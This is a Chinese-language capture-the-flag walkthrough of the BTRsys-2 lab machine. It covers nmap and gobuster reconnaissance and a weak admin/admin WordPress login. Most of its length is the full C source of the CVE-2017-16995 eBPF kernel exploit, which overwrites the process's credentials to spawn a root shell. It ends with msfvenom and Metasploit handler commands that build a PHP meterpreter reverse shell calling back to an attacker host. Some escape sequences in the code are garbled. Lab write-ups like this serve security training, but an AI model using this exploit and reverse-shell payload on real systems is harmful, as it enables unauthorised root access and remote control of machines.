nmap对目标进行扫描
nmap -A -p 80,21,22 -oA BTR.log
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-04 00:16 CST
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 1.24 seconds
root@kali:~/BTRsys-2# nmap -A -p 80,21,22 192.168.159.131 -oA BTR.log
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-04 00:17 CST
Nmap scan report for 192.168.159.131
Host is up (0.0014s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.159.128
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 08:ee:e3:ff:31:20:87:6c:12:e7:1c:aa:c4:e7:54:f2 (RSA)
| 256 ad:e1:1c:7d:e7:86:76:be:9a:a8:bd:b9:68:92:77:87 (ECDSA)
| 256 0c:e1:eb:06:0c:5c:b5:cc:1b:d1:fa:56:06:22:31:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
MAC Address: 00:0C:29:27:48:F5 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
对80端口进行目录扫描
root@kali:~/BTRsys-2# gobuster dir -u http://192.168.159.131 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php,bak,rar,zip
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: http://192.168.159.131
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,bak,rar,zip
[+] Timeout: 10s
2021/11/04 00:23:19 Starting gobuster in directory enumeration mode
/upload (Status: 301) [Size: 319] [–> http://192.168.159.131/upload/]
/wordpress (Status: 301) [Size: 322] [–> http://192.168.159.131/wordpress/]
/javascript (Status: 301) [Size: 323] [–> http://192.168.159.131/javascript/]
/INSTALL (Status: 200) [Size: 1241]
/LICENSE (Status: 200) [Size: 1672]
/COPYING (Status: 200) [Size: 35147]
/CHANGELOG (Status: 200) [Size: 224]
/server-status (Status: 403) [Size: 303]
发现一个为wordpress的页面扫描它的后台为wp-admin
直接尝试admin admin弱口令登录进入后台
wordpress getshell方法
https://www.jianshu.com/p/ffdbc362b69a
查看内核版本
使用cve-2017-16995
/*
* Ubuntu 16.04.4 kernel priv esc
*
* all credits to @bleidl
* - vnik
*/
// Tested on:
// 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64
// if different kernel adjust CRED offset + check kernel stack size
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <stdint.h>
#define PHYS_OFFSET 0xffff880000000000
#define CRED_OFFSET 0x5f8
#define UID_OFFSET 4
#define LOG_BUF_SIZE 65536
#define PROGSIZE 328
int sockets[2];
int mapfd, progfd;
char *__prog = "xb4x09x00x00xffxffxffxff"
"x55x09x02x00xffxffxffxff"
"xb7x00x00x00x00x00x00x00"
"x95x00x00x00x00x00x00x00"
"x18x19x00x00x03x00x00x00"
"x00x00x00x00x00x00x00x00"
"xbfx91x00x00x00x00x00x00"
"xbfxa2x00x00x00x00x00x00"
"x07x02x00x00xfcxffxffxff"
"x62x0axfcxffx00x00x00x00"
"x85x00x00x00x01x00x00x00"
"x55x00x01x00x00x00x00x00"
"x95x00x00x00x00x00x00x00"
"x79x06x00x00x00x00x00x00"
"xbfx91x00x00x00x00x00x00"
"xbfxa2x00x00x00x00x00x00"
"x07x02x00x00xfcxffxffxff"
"x62x0axfcxffx01x00x00x00"
"x85x00x00x00x01x00x00x00"
"x55x00x01x00x00x00x00x00"
"x95x00x00x00x00x00x00x00"
"x79x07x00x00x00x00x00x00"
"xbfx91x00x00x00x00x00x00"
"xbfxa2x00x00x00x00x00x00"
"x07x02x00x00xfcxffxffxff"
"x62x0axfcxffx02x00x00x00"
"x85x00x00x00x01x00x00x00"
"x55x00x01x00x00x00x00x00"
"x95x00x00x00x00x00x00x00"
"x79x08x00x00x00x00x00x00"
"xbfx02x00x00x00x00x00x00"
"xb7x00x00x00x00x00x00x00"
"x55x06x03x00x00x00x00x00"
"x79x73x00x00x00x00x00x00"
"x7bx32x00x00x00x00x00x00"
"x95x00x00x00x00x00x00x00"
"x55x06x02x00x01x00x00x00"
"x7bxa2x00x00x00x00x00x00"
"x95x00x00x00x00x00x00x00"
"x7bx87x00x00x00x00x00x00"
"x95x00x00x00x00x00x00x00";
char bpf_log_buf[LOG_BUF_SIZE];
static int bpf_prog_load(enum bpf_prog_type prog_type,
const struct bpf_insn *insns, int prog_len,
const char *license, int kern_version) {
union bpf_attr attr = {
.prog_type = prog_type,
.insns = (__u64)insns,
.insn_cnt = prog_len / sizeof(struct bpf_insn),
.license = (__u64)license,
.log_buf = (__u64)bpf_log_buf,
.log_size = LOG_BUF_SIZE,
.log_level = 1,
};
attr.kern_version = kern_version;
bpf_log_buf[0] = 0;
return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}
static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
int max_entries) {
union bpf_attr attr = {
.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries
};
return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}
static int bpf_update_elem(uint64_t key, uint64_t value) {
union bpf_attr attr = {
.map_fd = mapfd,
.key = (__u64)&key,
.value = (__u64)&value,
.flags = 0,
};
return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}
static int bpf_lookup_elem(void *key, void *value) {
union bpf_attr attr = {
.map_fd = mapfd,
.key = (__u64)key,
.value = (__u64)value,
};
return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}
static void __exit(char *err) {
fprintf(stderr, "error: %s
", err);
exit(-1);
}
static void prep(void) {
mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);
if (mapfd < 0)
__exit(strerror(errno));
progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
(struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);
if (progfd < 0)
__exit(strerror(errno));
if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))
__exit(strerror(errno));
if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
__exit(strerror(errno));
}
static void writemsg(void) {
char buffer[64];
ssize_t n = write(sockets[0], buffer, sizeof(buffer));
if (n < 0) {
perror("write");
return;
}
if (n != sizeof(buffer))
fprintf(stderr, "short write: %lu
", n);
}
#define __update_elem(a, b, c)
bpf_update_elem(0, (a));
bpf_update_elem(1, (b));
bpf_update_elem(2, (c));
writemsg();
static uint64_t get_value(int key) {
uint64_t value;
if (bpf_lookup_elem(&key, &value))
__exit(strerror(errno));
return value;
}
static uint64_t __get_fp(void) {
__update_elem(1, 0, 0);
return get_value(2);
}
static uint64_t __read(uint64_t addr) {
__update_elem(0, addr, 0);
return get_value(2);
}
static void __write(uint64_t addr, uint64_t val) {
__update_elem(2, addr, val);
}
static uint64_t get_sp(uint64_t addr) {
return addr & ~(0x4000 - 1);
}
static void pwn(void) {
uint64_t fp, sp, task_struct, credptr, uidptr;
fp = __get_fp();
if (fp < PHYS_OFFSET)
__exit("bogus fp");
sp = get_sp(fp);
if (sp < PHYS_OFFSET)
__exit("bogus sp");
task_struct = __read(sp);
if (task_struct < PHYS_OFFSET)
__exit("bogus task ptr");
printf("task_struct = %lx
", task_struct);
credptr = __read(task_struct + CRED_OFFSET); // cred
if (credptr < PHYS_OFFSET)
__exit("bogus cred ptr");
uidptr = credptr + UID_OFFSET; // uid
if (uidptr < PHYS_OFFSET)
__exit("bogus uid ptr");
printf("uidptr = %lx
", uidptr);
__write(uidptr, 0); // set both uid and gid to 0
if (getuid() == 0) {
printf("spawning root shell
");
system("/bin/bash");
exit(0);
}
__exit("not vulnerable?");
}
int main(int argc, char **argv) {
prep();
pwn();
return 0;
}
下载地址:https://github.com/Al1ex/CVE-2017-16995/blob/master/exploit.c
直接在kali下编译好在上传
kali生成反弹php shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.159.128 LPORT=5555 R > test3.php
1 使用handler模块
msf > use exploit/multi/handler
2 设置payload
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp(当时windows时php换成windows)
PAYLOAD =>php/meterpreter/reverse_tcp
3 设置监听主机
msfexploit(multi/handler) > set LHOST 192.168.159.128
4 设置监听端口(默认4444)
msfexploit(multi/handler) > set LPORT 5555
LPORT => 5555
5 发动攻击
msfexploit(multi/handler) > exploit
成功反弹执行exp得到root权限